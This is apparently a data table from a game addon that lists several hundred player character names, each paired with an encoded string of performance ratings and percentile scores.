["Ewzy"] = "RT:450/57%RB:422/61%RM:254/60%",
["Wish"] = "ET:308/80%EB:572/79%RM:318/66%",
["Aesôp"] = "RT:164/51%RB:459/66%RM:439/52%",
["Yksky"] = "ET:369/89%LB:702/96%EM:504/77%",
["Koucd"] = "ET:636/81%EB:460/87%EM:823/88%",
["Trise"] = "ET:616/79%RB:363/50%RM:622/71%",
["Hueman"] = "UT:46/45%RB:431/61%RM:562/62%",
["Ezchicken"] = "UT:315/40%EB:412/84%UM:432/47%",
["Kylepally"] = "RT:502/65%EB:402/81%EM:643/92%",
["Shamakazî"] = "ET:299/79%EB:689/91%LM:920/95%",
["Anenga"] = "ET:352/86%EB:593/82%EM:702/77%",
["Paeter"] = "RT:216/66%EB:621/86%EM:827/88%",
["Mitts"] = "LT:675/95%LB:712/95%EM:611/91%",
["Tiziturax"] = "RT:250/70%EB:468/88%EM:772/84%",
["Nozlym"] = "ET:561/88%EB:621/84%EM:713/86%",
["Gothot"] = "ET:324/84%EB:679/91%EM:746/81%",
["Tincan"] = "UT:89/31%UB:222/27%",
["Reothink"] = "UT:318/40%EB:706/93%EM:863/91%",
["Nzi"] = "ET:793/94%EB:595/84%EM:598/89%",
["Chuggly"] = "UT:116/36%UB:240/30%RM:286/62%",
["Vroll"] = "LT:550/96%EB:514/91%EM:588/83%",
["Ohbamacare"] = "UT:299/36%RB:374/52%RM:596/68%",
["Haruspex"] = "RT:253/73%EB:546/78%EM:797/88%",
["Moouu"] = "LT:687/98%EB:509/91%LM:914/95%",
["Wuzetian"] = "RT:235/67%",
["Lilmagill"] = "RT:549/70%RB:380/53%EM:707/80%",
["Taelid"] = "EB:744/93%EM:852/88%",
["Culizn"] = "ET:365/92%EB:629/94%EM:570/86%",
["Guqingshan"] = "ET:339/88%EB:720/91%EM:848/87%",
["Layer"] = "ET:734/94%LB:775/97%LM:952/96%",
["Kamedin"] = "CT:120/20%EB:683/86%EM:768/81%",
["Tabaskoko"] = "ET:593/77%EB:730/92%EM:594/86%",
["Slowmanx"] = "RT:462/60%EB:643/83%RM:659/71%",
["Arryk"] = "EB:740/93%EM:870/89%",
["Strykn"] = "ET:739/94%LB:667/96%EM:916/93%",
["Guccifart"] = "ST:797/99%SB:822/99%SM:950/99%",
["Jibexi"] = "LT:628/98%LB:778/98%LM:961/97%",
["Guerilla"] = "ET:417/94%EB:624/94%EM:737/94%",
["Theondria"] = "RT:516/70%EB:643/83%EM:715/78%",
["Deliriøus"] = "ET:708/91%SB:751/99%SM:932/99%",
["Ision"] = "ET:334/89%EB:709/90%EM:741/78%",
["Gankwall"] = "LT:775/98%SB:797/99%SM:1013/99%",
["Kanesmash"] = "CT:124/20%LB:781/97%LM:950/96%",
["Stun"] = "LT:655/98%LB:699/97%LM:854/97%",
["Skadoodle"] = "UT:298/41%EB:734/92%EM:834/86%",
["Fiøricet"] = "ST:771/99%SB:764/99%LM:898/98%",
["Stabjob"] = "ET:447/94%EB:723/91%EM:924/94%",
["Lîon"] = "ET:686/88%SB:753/99%LM:943/96%",
["Feralmango"] = "ST:797/99%LB:776/98%LM:920/97%",
["Girthquake"] = "ST:789/99%LB:740/98%LM:881/98%",
["Fme"] = "EB:649/84%LM:953/95%",
["Kelborn"] = "EB:717/90%EM:872/89%",
["Grynd"] = "ST:805/99%SB:806/99%LM:932/97%",
["Kaage"] = "RT:487/66%EB:680/91%EM:734/78%",
["Kaaxth"] = "RT:237/74%LB:703/97%LM:869/97%",
["Smokahotas"] = "EB:707/90%EM:694/75%",
["Adler"] = "ET:361/90%LB:761/96%EM:747/93%",
["Bullnorris"] = "LT:749/95%LB:631/95%LM:935/96%",
["Negus"] = "ET:272/80%LB:628/95%LM:947/96%",
["Lassassino"] = "ST:704/99%LB:740/98%EM:906/92%",
["Handsomebob"] = "ET:695/89%LB:735/98%EM:917/93%",
["Calc"] = "ET:739/94%SB:813/99%SM:866/99%",
["Pikapikapi"] = "LT:768/97%LB:780/98%LM:924/97%",
["Krisrogue"] = "LT:496/96%SB:770/99%LM:869/97%",
["Moonsheep"] = "RT:217/72%LB:793/98%SM:1007/99%",
["Mwe"] = "ST:774/99%LB:747/98%SM:956/99%",
["Bibita"] = "CT:54/17%EB:747/94%LM:949/96%",
["Koregath"] = "ET:592/79%EB:622/81%EM:677/75%",
["Zolo"] = "ET:260/80%EB:641/83%EM:822/85%",
["Doogsmacks"] = "ET:694/90%EB:685/87%RM:679/72%",
["Zbot"] = "LT:791/98%SB:814/99%LM:967/97%",
["Orion"] = "UT:121/46%EB:675/86%EM:762/82%",
["Innthebigini"] = "ET:712/91%EB:544/90%EM:721/79%",
["Tanknspankme"] = "ET:737/94%EB:715/90%LM:764/95%",
["Kreavesy"] = "UT:375/49%SB:808/99%SM:1002/99%",
["Devillike"] = "UT:291/37%EB:601/93%EM:895/91%",
["Diasha"] = "ST:801/99%LB:793/98%SM:1043/99%",
["Tctuggers"] = "ET:623/81%EB:747/94%EM:905/93%",
["Canyouquack"] = "ET:716/92%EB:544/90%EM:598/88%",
["Shows"] = "EB:640/83%",
["Bangarangz"] = "EB:623/81%EM:737/78%",
["Tiralius"] = "ST:704/99%SB:764/99%SM:865/99%",
["Pkfya"] = "RT:230/74%SB:809/99%EM:915/94%",
["Vajslayer"] = "ET:579/77%EB:724/91%EM:784/84%",
["Krump"] = "ET:324/88%EB:689/88%EM:881/91%",
["Sni"] = "ET:634/82%EB:697/88%EM:846/88%",
["Roaming"] = "ET:248/76%EB:749/94%LM:936/95%",
["Danen"] = "LT:451/95%EB:752/94%SM:941/99%",
["Gricka"] = "LB:767/96%LM:949/96%",
["Wewt"] = "LT:792/98%SB:807/99%SM:1010/99%",
["Shadyhealer"] = "RT:471/59%RB:423/60%UM:333/39%",
["Brrenna"] = "CT:27/1%EB:591/82%EM:832/90%",
["Wingless"] = "ET:672/83%EB:654/89%EM:699/82%",
["Shocktherapy"] = "ET:402/89%EB:539/93%RM:357/71%",
["Hammerdinn"] = "LB:721/95%EM:828/88%",
["Foxxi"] = "RT:521/66%LB:745/97%EM:791/86%",
["Wastedspace"] = "EB:565/78%EM:799/88%",
["Bürtha"] = "RT:439/55%RB:479/69%EM:855/93%",
["Gallealz"] = "RB:468/64%EM:736/81%",
["Blooberrie"] = "RT:261/72%EB:677/92%EM:836/90%",
["Jintolin"] = "UT:147/46%EB:662/89%EM:691/76%",
["Rambò"] = "EB:702/94%EM:891/94%",
["Morkett"] = "RT:77/55%RB:462/74%RM:497/67%",
["Pewpz"] = "UT:263/31%EB:648/87%EM:761/82%",
["Gottem"] = "RT:155/59%EB:411/82%EM:755/85%",
["Onefnp"] = "RT:446/56%RB:521/72%EM:699/75%",
["Catbread"] = "ET:330/84%LB:712/95%LM:969/98%",
["Angelofmercy"] = "ET:304/79%EB:572/81%RM:459/50%",
["Lasting"] = "CT:173/19%EB:450/86%EM:845/92%",
["Priestguyy"] = "UT:89/28%RB:376/54%UM:151/41%",
["Wandspec"] = "RB:460/67%CM:12/17%",
["Cornel"] = "UT:221/30%EB:696/93%LM:956/97%",
["Zeitmnai"] = "RT:238/68%EB:525/75%EM:506/83%",
["Pandaret"] = "EB:566/78%EM:728/79%",
["Snocone"] = "UT:347/47%EB:496/91%EM:657/76%",
["Jonber"] = "UT:346/45%EB:443/87%EM:734/80%",
["Skella"] = "EB:560/78%RM:606/71%",
["Nardwar"] = "RT:205/60%EB:459/87%EM:780/86%",
["Needled"] = "EB:382/79%EM:756/86%",
["Sisterjackie"] = "RT:243/69%EB:476/89%RM:450/53%",
["Ehhduh"] = "RT:166/55%EB:510/91%EM:790/85%",
["Feelsbadman"] = "CT:12/16%RB:370/53%RM:445/53%",
["Hizzacked"] = "UT:135/43%RB:452/73%EM:672/82%",
["Priestialiti"] = "UT:154/48%EB:479/89%EM:457/80%",
["Linxta"] = "ET:628/79%EB:652/91%EM:817/91%",
["Zaeya"] = "LT:503/96%LB:728/96%LM:904/95%",
["Softms"] = "ET:640/84%SB:784/99%SM:998/99%",
["Galimir"] = "RT:492/64%EB:664/91%EM:905/94%",
["Wangdachui"] = "ET:673/85%EB:525/92%EM:781/84%",
["Rosaires"] = "RB:260/61%RM:462/55%",
["Theielleria"] = "RB:499/71%EM:823/91%",
["Gnooch"] = "CT:38/2%RB:509/70%EM:791/86%",
["Zdominion"] = "RT:487/65%EB:547/78%EM:530/87%",
["Sanc"] = "LB:730/96%SM:994/99%",
["Surgicalmask"] = "UT:246/30%RB:501/72%UM:389/46%",
["Idaru"] = "UT:280/34%EB:540/77%EM:707/81%",
["Zin"] = "ET:595/78%EB:474/89%EM:895/94%",
["Raisu"] = "LT:751/95%LB:593/95%EM:842/89%",
["Mothhater"] = "ET:735/94%EB:722/92%EM:842/89%",
["Bluntstain"] = "ET:729/93%EB:740/93%LM:935/95%",
["Solzat"] = "ST:807/99%SB:774/99%SM:981/99%",
["Cltcmdr"] = "ET:604/80%EB:741/94%EM:765/82%",
["Chicken"] = "LT:749/95%LB:772/97%LM:948/96%",
["Mostrogue"] = "ET:710/91%EB:603/93%EM:640/88%",
["Seczy"] = "LT:746/95%LB:646/95%EM:813/86%",
["Biink"] = "LT:748/95%EB:511/91%EM:881/92%",
["Thepenguin"] = "ET:708/92%EB:739/94%LM:957/97%",
["Anduinsmage"] = "LT:751/95%EB:733/93%LM:912/96%",
["Sense"] = "LT:622/98%LB:610/96%LM:935/95%",
["Mistaveeb"] = "ET:707/91%LB:789/98%EM:858/90%",
["Reo"] = "ST:788/99%SB:766/99%LM:977/98%",
["Jizee"] = "LT:750/95%EB:510/88%EM:746/79%",
["Decorous"] = "ET:630/84%EB:647/89%SM:1013/99%",
["Fusoya"] = "RT:523/70%EB:663/89%EM:736/80%",
["Aroedem"] = "LT:757/96%EB:541/76%",
["Doberman"] = "ET:637/85%LB:748/95%LM:957/97%",
["Fishsheep"] = "ET:380/92%EB:689/89%EM:843/89%",
["Leiloni"] = "LT:769/97%LB:784/98%LM:951/97%",
["Daara"] = "LT:444/95%EB:722/91%LM:957/96%",
["Tufo"] = "ET:652/85%EB:628/81%UM:382/44%",
["Arcticon"] = "ET:707/91%LB:772/97%LM:954/97%",
["Aerieka"] = "LT:749/95%EB:710/94%SM:960/99%",
["Xiaooyu"] = "LT:619/98%LB:745/98%EM:897/93%",
["Ipecac"] = "LT:783/98%LB:796/98%LM:905/98%",
["Prettylights"] = "ET:557/75%EB:611/94%RM:551/62%",
["Kildarsx"] = "ET:686/89%EB:696/90%EM:730/79%",
["Fatalic"] = "ST:801/99%LB:774/97%LM:964/98%",
["Tristan"] = "ET:629/84%RB:414/61%RM:218/60%",
["Bace"] = "ET:727/93%LB:662/96%EM:489/81%",
["Gharouk"] = "ET:713/92%RB:520/74%EM:860/87%",
["Zerothatsme"] = "ET:666/87%SB:811/99%SM:1002/99%",
["Dendimon"] = "LT:785/98%SB:790/99%SM:919/99%",
["Gakky"] = "LT:752/95%LB:626/95%EM:889/91%",
["Blashyrk"] = "LT:784/98%SB:794/99%LM:975/98%",
["Uncondomed"] = "LT:758/96%EB:665/86%EM:874/91%",
["Cheesepuff"] = "ST:674/99%SB:686/99%LM:815/98%",
["Jross"] = "ET:709/91%LB:794/98%SM:1015/99%",
["Bacalo"] = "ST:742/99%EB:742/94%EM:869/91%",
["Warlockdaddy"] = "LT:768/97%LB:629/95%EM:920/94%",
["Hammerlock"] = "ST:831/99%SB:848/99%SM:1054/99%",
["Adins"] = "ST:822/99%SB:862/99%LM:967/98%",
["Dirtyless"] = "LT:759/96%LB:764/96%LM:934/95%",
["Cmgs"] = "ET:583/78%EB:658/83%EM:782/84%",
["Jonjon"] = "ET:733/93%EB:729/92%EM:795/82%",
["Gamepunisher"] = "ST:703/99%SB:717/99%LM:962/97%",
["Uncleroyze"] = "LT:747/95%LB:785/98%LM:924/96%",
["Weltschmerz"] = "LT:450/95%EB:703/93%EM:891/92%",
["Onhold"] = "ET:670/88%EB:703/90%EM:883/92%",
["Hollowhinata"] = "ET:681/88%EB:713/90%EM:853/84%",
["Mcdonaldyaya"] = "ET:651/86%EB:662/83%EM:788/82%",
["Raw"] = "LT:745/95%EB:744/94%EM:897/93%",
["Jeno"] = "LT:751/96%SB:848/99%LM:981/98%",
["Duerduerduer"] = "ET:739/94%LB:783/98%LM:909/95%",
["Phirt"] = "RT:457/58%EB:634/87%EM:843/90%",
["Corecoix"] = "RT:468/59%CB:102/10%UM:143/38%",
["Farik"] = "UT:120/42%RB:461/66%RM:503/58%",
["Paschendale"] = "ET:379/87%EB:503/90%EM:755/78%",
["Totemshaman"] = "RT:594/74%EB:533/76%EM:684/77%",
["Boetems"] = "ET:742/90%EB:633/87%EM:808/88%",
["Boundlez"] = "ET:337/83%RB:368/51%RM:347/69%",
["Mojomaker"] = "RT:521/65%EB:634/87%EM:719/81%",
["Cowismomo"] = "RT:240/73%EB:500/92%RM:534/59%",
["Notholyspec"] = "UT:110/38%CB:176/20%",
["Artemia"] = "CT:80/24%RB:493/71%RM:661/73%",
["Aoshine"] = "ET:631/78%EB:679/91%UM:330/38%",
["Xiaomuniou"] = "RT:255/71%RB:536/74%EM:813/87%",
["Flashbackjak"] = "ET:462/81%EB:635/89%EM:854/93%",
["Fuglykid"] = "ET:309/79%EB:391/81%EM:699/77%",
["Chingona"] = "ET:458/93%RB:335/73%RM:360/71%",
["Meowuu"] = "ET:650/82%EB:680/91%EM:816/87%",
["Asthetica"] = "RT:400/50%EB:580/81%EM:818/88%",
["Midaybbq"] = "LT:739/97%LB:756/97%SM:978/99%",
["Rallo"] = "RT:531/67%EB:624/88%EM:836/92%",
["Meicen"] = "CT:48/11%UB:199/48%RM:512/60%",
["Livinbeard"] = "RT:169/56%EB:532/76%EM:475/82%",
["Psilocybo"] = "ET:785/94%EB:550/94%EM:799/86%",
["Storming"] = "LT:591/97%LB:641/97%EM:621/90%",
["Gaogezi"] = "ET:619/79%UB:291/38%CM:142/16%",
["Holdmyshock"] = "ET:621/79%EB:687/93%LM:887/95%",
["Mmbacon"] = "ET:778/93%EB:531/92%EM:877/93%",
["Tyraxus"] = "RT:556/70%EB:537/93%EM:679/77%",
["Pingoo"] = "RT:506/69%UB:255/32%RM:262/63%",
["Dwarvenpally"] = "UT:293/35%RB:431/61%UM:144/42%",
["Easyclap"] = "UT:316/41%EB:584/83%RM:256/60%",
["Maxwellz"] = "RT:187/62%LB:739/97%LM:923/96%",
["Drgreen"] = "ET:585/85%EB:608/90%LM:919/98%",
["Imaginewhat"] = "ET:428/91%EB:543/77%EM:715/78%",
["Kimjongheals"] = "ET:516/84%EB:660/90%EM:669/82%",
["Saltedfish"] = "CT:42/3%UB:237/30%UM:418/45%",
["Arkouda"] = "ET:362/87%EB:655/89%EM:746/81%",
["Qoq"] = "ET:692/85%EB:596/83%EM:913/94%",
["Drakyo"] = "UT:386/49%RB:326/73%CM:32/13%",
["Redbird"] = "CT:192/22%EB:522/75%RM:640/71%",
["Calesta"] = "ET:451/93%EB:491/90%RM:267/65%",
["Lindahlia"] = "UT:140/48%RB:369/52%UM:296/30%",
["Riej"] = "ET:634/79%EB:616/85%EM:689/93%",
["Nitiri"] = "RT:429/59%EB:631/86%LM:940/96%",
["Vooduu"] = "LT:561/96%LB:593/95%EM:835/88%",
["Toxif"] = "ST:831/99%AB:918/100%SM:1115/99%",
["Bej"] = "ET:607/78%RB:492/70%EM:653/75%",
["Buttshock"] = "ET:386/88%EB:565/80%EM:603/89%",
["Papershift"] = "UT:356/49%LB:727/95%EM:762/83%",
["Phoenixarka"] = "UT:267/32%EB:576/79%EM:814/87%",
["Zzp"] = "RT:216/62%RB:520/72%EM:823/87%",
["Moonsakura"] = "RT:417/52%RB:472/68%RM:622/72%",
["Babydarren"] = "CT:69/23%RB:234/54%UM:83/28%",
["Smallrain"] = "RT:244/73%EB:544/75%EM:846/90%",
["Lyanns"] = "RT:538/70%EB:646/88%EM:903/94%",
["Maxstats"] = "ET:405/90%LB:587/95%LM:921/95%",
["Vengeancee"] = "UT:254/31%RB:313/70%",
["Gokuclose"] = "RT:225/61%RB:431/72%EM:836/92%",
["Bunyou"] = "CT:110/11%UB:187/43%RM:434/50%",
["Soontirfel"] = "UT:362/45%RB:516/71%EM:683/75%",
["Zgifted"] = "CT:208/24%RB:516/72%EM:742/81%",
["Tinyskelly"] = "ET:323/81%RB:422/61%RM:267/61%",
["Klouse"] = "RT:574/74%RB:486/70%EM:648/75%",
["Gauze"] = "UT:26/29%RB:397/54%EM:691/76%",
["Fearwardme"] = "LT:541/97%EB:717/91%EM:808/91%",
["Asukak"] = "LT:783/98%SB:783/99%LM:936/96%",
["Waderoblin"] = "RT:191/66%EB:684/86%EM:879/90%",
["Heshenzz"] = "LT:760/97%EB:725/94%LM:891/95%",
["Beverall"] = "ET:624/81%LB:634/95%RM:662/72%",
["Locknlold"] = "LT:778/98%SB:811/99%LM:875/98%",
["Whaleherders"] = "ET:701/90%EB:530/89%EM:802/84%",
["Booyakha"] = "ET:602/80%EB:549/90%EM:808/86%",
["Undeadcher"] = "ET:442/94%EB:574/92%RM:320/64%",
["Melvski"] = "ET:272/81%EB:688/88%EM:706/92%",
["Shaka"] = "LT:463/95%LB:670/96%EM:898/91%",
["Threeleven"] = "EB:676/86%EM:746/79%",
["Yamori"] = "ET:255/77%EB:497/87%EM:769/80%",
["Ironbaby"] = "LT:505/97%LB:754/95%EM:873/90%",
["Kazak"] = "ET:290/85%EB:682/87%EM:788/82%",
["Lavitzio"] = "ET:626/83%EB:703/89%EM:870/89%",
["Lithos"] = "ET:663/86%EB:703/89%EM:833/86%",
["Degann"] = "ET:380/93%LB:763/96%LM:931/96%",
["Backstabc"] = "ET:334/88%LB:758/95%LM:947/96%",
["Realfrosted"] = "LT:748/95%SB:829/99%LM:965/97%",
["Hizlo"] = "EB:640/83%RM:463/54%",
["Doflamìngo"] = "ET:653/85%LB:653/96%LM:861/97%",
["Nad"] = "ET:618/82%EB:700/89%EM:743/81%",
["Relkan"] = "UT:91/33%EB:731/92%EM:925/94%",
["Bangpeh"] = "ET:654/85%EB:742/94%EM:763/82%",
["Shuníon"] = "EB:717/91%RM:518/59%",
["Martymcfly"] = "ET:239/77%EB:675/86%EM:773/81%",
["Duress"] = "ET:372/91%EB:570/92%EM:927/94%",
["Doomstriker"] = "ET:618/82%LB:663/96%LM:764/95%",
["Surprize"] = "ET:614/80%EB:719/91%EM:792/82%",
["Anova"] = "ET:251/81%SB:799/99%EM:580/81%",
["Shadöwburn"] = "LT:759/96%SB:796/99%SM:995/99%",
["Khroe"] = "ET:265/81%SB:848/99%SM:1009/99%",
["Ws"] = "SB:798/99%LM:966/97%",
["Jumm"] = "CT:2/3%EB:693/88%EM:895/92%",
["Plaque"] = "RT:541/73%EB:670/86%EM:730/80%",
["Adrianc"] = "ET:257/78%EB:719/90%RM:583/64%",
["Dark"] = "RT:411/54%EB:690/87%EM:929/93%",
["Pjpartytank"] = "LT:426/95%EB:696/88%EM:649/90%",
["Russanos"] = "SB:832/99%SM:1033/99%",
["Deathxd"] = "EB:498/87%EM:566/86%",
["Fiskers"] = "ET:658/85%EB:710/90%EM:892/91%",
["Lick"] = "ET:734/93%LB:685/97%LM:964/97%",
["Timenchanter"] = "ET:720/93%LB:752/96%LM:954/97%",
["Homeomane"] = "ET:677/91%LB:792/98%SM:978/99%",
["Squirtylove"] = "RT:464/64%EB:675/85%EM:251/75%",
["Pinkprincess"] = "ET:693/89%EB:733/93%EM:675/90%",
["Edward"] = "ET:728/94%LB:778/98%LM:916/95%",
["Zattah"] = "EB:702/89%EM:838/86%",
["Caphesuada"] = "ET:321/88%EB:666/85%EM:762/82%",
["Glzh"] = "UT:248/32%EB:740/93%EM:877/90%",
["Eggner"] = "RT:374/50%LB:766/96%LM:947/96%",
["Jeezlouise"] = "UT:94/38%EB:628/81%EM:905/93%",
["Whité"] = "ET:743/94%EB:710/90%EM:933/94%",
["Skeeter"] = "ET:621/82%EB:680/87%EM:874/90%",
["Endo"] = "ET:574/76%LB:783/98%SM:1062/99%",
["Ghosted"] = "ET:419/93%EB:602/93%EM:917/93%",
["Darkkchaos"] = "LT:759/97%LB:771/97%LM:781/98%",
["Keyboardd"] = "UT:124/47%EB:667/84%RM:447/66%",
["Gxdlike"] = "ET:267/79%EB:713/90%RM:401/72%",
["Overthought"] = "RT:357/50%EB:704/88%EM:889/91%",
["Estukay"] = "ET:655/85%LB:680/97%EM:859/89%",
["Supersurfer"] = "LB:791/98%SM:1012/99%",
["Fortitude"] = "ST:837/99%SB:918/99%SM:1073/99%",
["Jillidan"] = "EB:671/90%EM:805/87%",
["Everseer"] = "ET:584/88%EB:570/80%RM:588/68%",
["Abiogenesis"] = "EB:604/83%EM:794/86%",
["Earthshaper"] = "RT:505/63%EB:488/90%RM:603/70%",
["Venitan"] = "CT:205/24%RB:443/64%RM:467/55%",
["Lightson"] = "RB:410/56%EM:730/80%",
["Janella"] = "UB:307/40%EM:574/88%",
["Imune"] = "RB:392/55%EM:775/84%",
["Evilprist"] = "RB:301/67%CM:22/3%",
["Hazie"] = "CT:37/2%RB:310/69%EM:687/79%",
["Tumnus"] = "RT:178/54%RB:460/66%EM:706/79%",
["Voxcow"] = "ET:721/88%EB:649/89%EM:789/82%",
["Raavah"] = "RB:290/64%RM:584/64%",
["Volcstar"] = "RT:223/64%EB:578/81%EM:551/86%",
["Kisyhp"] = "UB:264/35%UM:314/37%",
["Shoktarts"] = "CT:183/21%RB:497/69%RM:530/59%",
["Arade"] = "ET:593/75%EB:396/81%EM:779/85%",
["Rhyson"] = "CT:69/6%UB:318/43%RM:669/73%",
["Yab"] = "LB:742/96%LM:974/98%",
["Cocainexanny"] = "UT:224/26%UB:301/41%RM:271/60%",
["Daliancat"] = "RT:191/62%EB:586/83%EM:699/77%",
["Klear"] = "UT:137/43%EB:622/87%LM:898/95%",
["Grandmasgift"] = "CT:179/20%EB:385/79%EM:413/77%",
["Quackers"] = "ET:474/94%EB:601/85%EM:661/92%",
["Frothyx"] = "RB:443/63%EM:733/84%",
["Healirygank"] = "CT:92/9%EB:525/75%RM:598/70%",
["Shadöra"] = "RT:572/72%EB:551/79%LM:877/95%",
["Buffskeeter"] = "RB:393/56%EM:744/81%",
["Zeedoc"] = "LT:634/98%EB:539/93%EM:727/80%",
["Vexinoald"] = "RB:315/68%UM:352/40%",
["Texäs"] = "ET:374/87%EB:566/80%RM:537/73%",
["Gregbeekeepr"] = "LB:764/98%LM:930/96%",
["Sagrado"] = "UT:218/25%EB:635/87%EM:798/86%",
["Manaconda"] = "RT:525/67%RB:484/69%RM:577/64%",
["Whatdapoof"] = "ET:649/92%EB:549/92%EM:778/89%",
["Völur"] = "LT:554/96%EB:582/82%RM:306/50%",
["Mightidino"] = "RT:207/65%EB:559/94%EM:732/80%",
["Kahootz"] = "ST:707/99%LB:566/95%LM:943/97%",
["Beckðn"] = "LT:726/96%LB:748/96%LM:963/98%",
["Shinta"] = "LB:763/98%LM:917/95%",
["Biggiesmells"] = "RT:251/70%EB:625/86%EM:746/83%",
["Dubi"] = "RB:451/65%RM:282/51%",
["Gundrax"] = "RT:190/61%EB:698/94%EM:765/83%",
["Huoot"] = "LT:548/96%LB:711/95%LM:947/98%",
["Milkt"] = "CT:199/23%EB:395/81%EM:440/78%",
["Lucrative"] = "ST:820/99%LB:770/97%LM:961/98%",
["Grubbertius"] = "LT:750/95%LB:631/97%EM:846/93%",
["Recked"] = "ET:705/93%LB:785/98%SM:967/99%",
["Plazmix"] = "LT:450/95%LB:764/98%LM:938/96%",
["Automan"] = "ET:616/81%EB:613/80%",
["Huwawa"] = "ET:743/94%LB:765/96%LM:940/95%",
["Miyabisama"] = "ET:600/80%LB:709/98%EM:785/84%",
["Supersao"] = "LT:757/96%EB:750/94%LM:932/95%",
["Sandown"] = "ET:596/79%SB:801/99%SM:984/99%",
["Dabliz"] = "ET:583/77%RB:477/69%UM:116/41%",
["Fede"] = "LT:762/96%LB:772/97%EM:891/93%",
["Magicmurloc"] = "ET:636/84%EB:502/90%EM:861/90%",
["Nolman"] = "LT:779/98%SB:807/99%SM:1008/99%",
["Bask"] = "ST:760/99%SB:763/99%SM:997/99%",
["Jolrel"] = "ST:796/99%SB:801/99%LM:956/97%",
["Mikajin"] = "ET:737/94%LB:670/96%LM:928/95%",
["Mastaroshi"] = "RT:531/70%EB:664/85%LM:783/95%",
["Elwobbito"] = "LT:760/96%EB:722/94%EM:825/87%",
["Chilicrisp"] = "LT:637/98%LB:774/98%LM:969/98%",
["Stevedave"] = "ET:652/89%SB:777/99%SM:986/99%",
["Leii"] = "LT:756/95%LB:786/98%LM:983/98%",
["Twotall"] = "LT:749/95%EB:727/93%LM:931/95%",
["Gunpowder"] = "LT:791/98%LB:789/98%LM:951/96%",
["Zemeo"] = "ET:729/93%LB:770/97%LM:807/96%",
["Deepshadow"] = "ET:681/88%EB:638/82%EM:781/81%",
["Memerdreamer"] = "LT:581/97%LB:757/95%EM:866/89%",
["Gear"] = "LT:785/98%LB:779/98%LM:948/97%",
["Lissandraa"] = "LT:654/98%LB:793/98%LM:951/96%",
["Brahbrah"] = "ET:590/77%RB:231/53%UM:399/46%",
["Kerrybones"] = "ET:358/90%LB:754/97%LM:961/97%",
["Wompe"] = "RT:519/69%EB:721/92%EM:883/92%",
["Idiom"] = "LT:748/95%LB:781/98%LM:942/96%",
["Dask"] = "ET:730/93%LB:748/96%LM:770/95%",
["Vudurogue"] = "ET:722/92%LB:771/96%EM:927/94%",
["Jazzaye"] = "RT:426/56%RB:433/63%RM:404/52%",
["Acrim"] = "ET:745/94%EB:573/92%EM:851/89%",
["Grouchygroom"] = "ET:389/92%LB:770/97%LM:970/98%",
["Hisokamag"] = "ET:665/87%LB:733/96%EM:903/93%",
["Critmunchkin"] = "ET:695/90%EB:583/82%EM:814/86%",
["Jwowlel"] = "LT:762/96%EB:749/94%EM:914/93%",
["Taromochi"] = "ET:695/90%EB:700/93%EM:843/89%",
["Davidsbuddy"] = "ET:712/92%LB:719/95%EM:809/90%",
["Tankymu"] = "ET:693/92%LB:737/95%LM:931/97%",
["Kraftyyx"] = "LT:765/97%LB:698/97%EM:786/82%",
["Corrigon"] = "LT:538/97%LB:752/95%LM:925/95%",
["Salak"] = "ET:724/93%LB:777/97%LM:958/97%",
["Fj"] = "LT:764/97%LB:769/96%LM:968/97%",
["Cawei"] = "LT:751/95%LB:759/97%EM:854/90%",
["Malyficent"] = "LT:470/95%LB:764/98%EM:531/89%",
["Daakal"] = "ST:743/99%LB:694/98%LM:938/96%",
["Krater"] = "ET:740/94%LB:778/97%LM:930/95%",
["Oldthorium"] = "ET:737/94%LB:763/96%EM:906/93%",
["Roick"] = "ET:682/88%EB:588/93%EM:925/94%",
["Ninjasaurus"] = "LT:752/96%EB:695/92%EM:805/89%",
["Tubble"] = "ET:694/90%EB:542/93%EM:851/93%",
["Yorkgogo"] = "LT:776/98%LB:784/98%SM:991/99%",
["Abstinence"] = "ST:809/99%LB:789/98%LM:962/97%",
["Wrekdum"] = "ET:328/84%EB:455/78%EM:644/82%",
["Amanlu"] = "ET:336/85%EB:691/93%EM:664/93%",
["Aliezx"] = "ET:614/77%EB:618/87%RM:627/73%",
["Wellearned"] = "CT:0/3%LB:716/95%EM:876/92%",
["Audbal"] = "RT:560/72%UB:246/31%CM:56/24%",
["Marsfrancis"] = "UT:319/39%EB:628/86%RM:504/55%",
["Iamfaith"] = "UT:126/44%EB:688/92%EM:850/90%",
["Bonersteel"] = "ET:346/84%EB:476/89%EM:808/88%",
["Yehanlibi"] = "ET:706/87%EB:635/88%RM:458/55%",
["Robthegiant"] = "ET:303/81%RB:84/56%RM:532/59%",
["Thoushadowi"] = "ET:351/86%EB:673/91%EM:720/81%",
["Altmidas"] = "CT:73/7%UB:178/43%UM:421/45%",
["Healkinxo"] = "RT:548/68%RB:474/68%RM:229/56%",
["Birdman"] = "CT:159/18%CB:117/12%UM:153/44%",
["Touchmyudder"] = "UT:119/37%UB:108/42%RM:349/63%",
["Angelgodess"] = "RT:189/57%EB:408/83%EM:447/79%",
["Gonzo"] = "LT:700/95%LB:752/97%LM:886/95%",
["Othrys"] = "RT:390/51%RB:389/55%EM:494/76%",
["Pluvian"] = "RT:430/53%RB:326/73%EM:692/76%",
["Whyalwaysot"] = "CM:64/18%",
["Hyperial"] = "ST:775/99%SB:816/99%SM:1016/99%",
["Mderfker"] = "ET:629/80%EB:428/84%EM:781/85%",
["Pepesilviå"] = "CT:78/23%RB:243/57%UM:172/44%",
["Nerfie"] = "LT:742/98%LB:727/96%EM:690/87%",
["Macdizzle"] = "CT:22/3%EB:590/81%EM:811/87%",
["Lauris"] = "UT:326/43%RB:308/61%RM:325/58%",
["Pokpook"] = "RT:548/69%EB:540/77%EM:809/88%",
["Logicflo"] = "CT:190/22%EB:391/80%EM:606/90%",
["Donvito"] = "ET:496/94%EB:650/87%EM:715/88%",
["Dredgelord"] = "RT:483/62%LB:618/97%RM:630/72%",
["Krugntug"] = "UT:42/47%RB:473/68%UM:345/40%",
["Arôc"] = "RT:537/70%EB:543/75%EM:681/75%",
["Purginator"] = "UT:21/28%UB:123/32%CM:11/11%",
["Mootsauce"] = "RT:167/51%EB:367/78%EM:708/78%",
["Okmoomoo"] = "ET:361/87%EB:501/90%EM:502/85%",
["Totopu"] = "UT:233/28%EB:545/75%EM:770/83%",
["Bigcoca"] = "UT:213/25%UB:338/48%RM:459/50%",
["Angelei"] = "CT:154/17%RB:467/64%RM:650/72%",
["Neinfans"] = "UT:327/39%RB:470/68%EM:828/90%",
["Louwill"] = "UT:108/35%EB:412/84%CM:194/20%",
["Golfdadx"] = "UT:225/30%RB:387/55%UM:293/34%",
